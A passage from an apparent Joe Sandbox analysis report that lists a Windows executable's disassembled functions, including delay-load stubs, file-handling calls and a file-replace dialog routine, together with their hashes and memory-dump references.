                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 87825eeaad442d5a2212b92d26b9b0f527db8e19415585744d04b2b60e5edcc0
                                                                                              • Instruction ID: 7d84ade529699a7ecf3d3d49b2dd078bcab4e4bb9755f9b059f874849567b813
                                                                                              • Opcode Fuzzy Hash: 87825eeaad442d5a2212b92d26b9b0f527db8e19415585744d04b2b60e5edcc0
                                                                                              • Instruction Fuzzy Hash: 0FA011B22AC003FCB00C32C2BC02C3A030CC0C8B203308A0AB08A800C8ABC0280A8832
                                                                                              Function 0010DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fd2f5d2f6ed232e805228f44060b887fd76ffa480f70ea6ff75ac75b87248d90
                                                                                              • Instruction ID: 7d84ade529699a7ecf3d3d49b2dd078bcab4e4bb9755f9b059f874849567b813
                                                                                              • Opcode Fuzzy Hash: fd2f5d2f6ed232e805228f44060b887fd76ffa480f70ea6ff75ac75b87248d90
                                                                                              • Instruction Fuzzy Hash: 0FA011B22AC003FCB00C32C2BC02C3A030CC0C8B203308A0AB08A800C8ABC0280A8832
                                                                                              Function 0010DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 08cfc8779aeb46c97fae1650f41555739b8705ecd13b82dc0762f755d25688b1
                                                                                              • Instruction ID: 7d84ade529699a7ecf3d3d49b2dd078bcab4e4bb9755f9b059f874849567b813
                                                                                              • Opcode Fuzzy Hash: 08cfc8779aeb46c97fae1650f41555739b8705ecd13b82dc0762f755d25688b1
                                                                                              • Instruction Fuzzy Hash: 0FA011B22AC003FCB00C32C2BC02C3A030CC0C8B203308A0AB08A800C8ABC0280A8832
                                                                                              Function 0010DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0af86cee23e0b1e63799adc816f31fb79b7067ef1bf445cb95adf1400683acc8
                                                                                              • Instruction ID: 7d84ade529699a7ecf3d3d49b2dd078bcab4e4bb9755f9b059f874849567b813
                                                                                              • Opcode Fuzzy Hash: 0af86cee23e0b1e63799adc816f31fb79b7067ef1bf445cb95adf1400683acc8
                                                                                              • Instruction Fuzzy Hash: 0FA011B22AC003FCB00C32C2BC02C3A030CC0C8B203308A0AB08A800C8ABC0280A8832
                                                                                              Function 0010DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5366308a93933f6e4251a8c7c667f527f6dda1878121e8241dec8ddbb3245eda
                                                                                              • Instruction ID: 27241767880c3cc7125ba14079561fced0e1e7c806277507204fb8544dd1aa3f
                                                                                              • Opcode Fuzzy Hash: 5366308a93933f6e4251a8c7c667f527f6dda1878121e8241dec8ddbb3245eda
                                                                                              • Instruction Fuzzy Hash: 88A011BA2AC00BBCB00C22803C0BC3A232CC8C0B20332882AF28A800C0ABC00C0A0830
                                                                                              Function 0010DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fc1dd100f65608ae2b7da5913ee0241e45ebbfdbcad03fc9fbeb9097d67d3713
                                                                                              • Instruction ID: 27241767880c3cc7125ba14079561fced0e1e7c806277507204fb8544dd1aa3f
                                                                                              • Opcode Fuzzy Hash: fc1dd100f65608ae2b7da5913ee0241e45ebbfdbcad03fc9fbeb9097d67d3713
                                                                                              • Instruction Fuzzy Hash: 88A011BA2AC00BBCB00C22803C0BC3A232CC8C0B20332882AF28A800C0ABC00C0A0830
                                                                                              Function 0010DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1bb6834e70a7ad05fca5fc34185c281fdd2cfc791d087b197f9542e40474e866
                                                                                              • Instruction ID: 27241767880c3cc7125ba14079561fced0e1e7c806277507204fb8544dd1aa3f
                                                                                              • Opcode Fuzzy Hash: 1bb6834e70a7ad05fca5fc34185c281fdd2cfc791d087b197f9542e40474e866
                                                                                              • Instruction Fuzzy Hash: 88A011BA2AC00BBCB00C22803C0BC3A232CC8C0B20332882AF28A800C0ABC00C0A0830
                                                                                              Function 0010DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0cf7d752e7a2be9c31677cf0fcfded637a1f33a5b3372a5947e18ec4547bc670
                                                                                              • Instruction ID: 27241767880c3cc7125ba14079561fced0e1e7c806277507204fb8544dd1aa3f
                                                                                              • Opcode Fuzzy Hash: 0cf7d752e7a2be9c31677cf0fcfded637a1f33a5b3372a5947e18ec4547bc670
                                                                                              • Instruction Fuzzy Hash: 88A011BA2AC00BBCB00C22803C0BC3A232CC8C0B20332882AF28A800C0ABC00C0A0830
                                                                                              Function 0010DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 85adea19918a95b8167bae4c1e3d175ae54348472e98805445a13313ec05607e
                                                                                              • Instruction ID: 80e4bfe2a88edc5779cf1bd328a12a799d7c6e64592b6bd3a992186ccbe4787c
                                                                                              • Opcode Fuzzy Hash: 85adea19918a95b8167bae4c1e3d175ae54348472e98805445a13313ec05607e
                                                                                              • Instruction Fuzzy Hash: 56A002B556D113BCB10C61917D56D76131CC4D4B51375891DB54A940D597C05C555431
                                                                                              Function 0010DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 12b0f2fbc266d5b02e43e4c481ec21107273cd7ee687d07b9c175e8e5199f5be
                                                                                              • Instruction ID: 80e4bfe2a88edc5779cf1bd328a12a799d7c6e64592b6bd3a992186ccbe4787c
                                                                                              • Opcode Fuzzy Hash: 12b0f2fbc266d5b02e43e4c481ec21107273cd7ee687d07b9c175e8e5199f5be
                                                                                              • Instruction Fuzzy Hash: 56A002B556D113BCB10C61917D56D76131CC4D4B51375891DB54A940D597C05C555431
                                                                                              Function 000F9EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,000F9104,?,?,-00001964), ref: 000F9EC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: efcb4897cef6b4ac59ea0699a86b30ba3b6e0349c3c1c6f5974ca04d7557d8d7
                                                                                              • Instruction ID: a8b12e1d2040e3d328fbd4ea2ba12a219679e54a45495886a3db505af1e3df50
                                                                                              • Opcode Fuzzy Hash: efcb4897cef6b4ac59ea0699a86b30ba3b6e0349c3c1c6f5974ca04d7557d8d7
                                                                                              • Instruction Fuzzy Hash: 75B011300A000AAA8E202B30EC08A283A20FB2230A30082A0B022CA0A0CB22C023AA00
                                                                                              Function 0010A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,0010A587,C:\Users\user\Desktop,00000000,0013946A,00000006), ref: 0010A326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: 6ad112ddc58631df2996c4b4339874224e7e983ecaa2e6160567e88c2b4a8931
                                                                                              • Instruction ID: 2318c697ceeaef71d9263a7384c75835c4ec49b2d95ff4154cfaf8580b9250de
                                                                                              • Opcode Fuzzy Hash: 6ad112ddc58631df2996c4b4339874224e7e983ecaa2e6160567e88c2b4a8931
                                                                                              • Instruction Fuzzy Hash: FCA01230194006668A100B30CC09C1576505760702F0086207002C00A0CB308874A500
                                                                                              Function 000F96D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,000F968F,?,?,?,?,00121FA1,000000FF), ref: 000F96EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: e01b12d2f989b8be159972bf00d58f36066170189d6b52a55a9bb7108e40449b
                                                                                              • Instruction ID: 0d64df23c21b61471426be0a65a574f0d0d9ab3815a42897c83d4266f5ae52a7
                                                                                              • Opcode Fuzzy Hash: e01b12d2f989b8be159972bf00d58f36066170189d6b52a55a9bb7108e40449b
                                                                                              • Instruction Fuzzy Hash: 8EF0E230046B088FDB308A20D5487A2B7E89B12339F048B1ED2F743CE0E761688DAF00

                                                                                              Non-executed Functions

                                                                                              Function 0010B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0010B971
                                                                                              • EndDialog.USER32(?,00000006), ref: 0010B984
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 0010B9A0
                                                                                              • SetFocus.USER32(00000000), ref: 0010B9A7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0010B9E1
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0010BA18
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0010BA2E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0010BA4C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0010BA5C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0010BA78
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0010BA94
                                                                                              • _swprintf.LIBCMT ref: 0010BAC4
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0010BAD7
                                                                                              • FindClose.KERNEL32(00000000), ref: 0010BADE
                                                                                              • _swprintf.LIBCMT ref: 0010BB37
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0010BB4A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0010BB67
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0010BB87
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0010BB97
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0010BBB1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0010BBC9
                                                                                              • _swprintf.LIBCMT ref: 0010BBF5
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0010BC08
                                                                                              • _swprintf.LIBCMT ref: 0010BC5C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0010BC6F
                                                                                                • Part of subcall function 0010A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0010A662
                                                                                                • Part of subcall function 0010A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0012E600,?,?), ref: 0010A6B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-1840816070
